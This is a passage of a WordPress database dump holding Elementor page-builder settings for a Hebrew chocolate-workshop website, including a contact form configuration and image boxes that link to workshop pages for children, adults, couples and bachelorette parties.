\\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2342,436,'_elementor_edit_mode','builder'),(2343,436,'_elementor_template_type','section'),(2344,436,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:19:\"section_form_fields\";a:3:{s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_size\";i:1;s:12:\"button_width\";i:1;s:20:\"selected_button_icon\";i:1;}}s:5:\"style\";a:1:{s:20:\"section_button_style\";a:1:{s:17:\"button_text_color\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}}}}'),(2345,436,'_elementor_version','2.7.5'),(2346,436,'_elementor_pro_version','2.7.3'),(2347,437,'_elementor_edit_mode','builder'),(2348,437,'_elementor_template_type','section'),(2349,437,'_elementor_controls_usage','a:0:{}'),(2350,437,'_elementor_version','2.7.5'),(2351,437,'_elementor_pro_version','2.7.3'),(2352,436,'_wp_page_template','default'),(2353,436,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2354,436,'_elementor_data','[{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2355,438,'_elementor_edit_mode','builder'),(2356,438,'_elementor_template_type','section'),(2357,438,'_elementor_controls_usage','a:0:{}'),(2358,438,'_elementor_version','2.7.5'),(2359,438,'_elementor_pro_version','2.7.3'),(2360,438,'_wp_page_template','default'),(2361,438,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2362,438,'_elementor_data','[{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2363,439,'_elementor_edit_mode','builder'),(2364,439,'_elementor_template_type','wp-page'),(2365,439,'_elementor_version','2.7.5'),(2366,439,'_elementor_pro_version','2.7.3'),(2367,439,'_wp_page_template','elementor_header_footer'),(2368,439,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2369,439,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\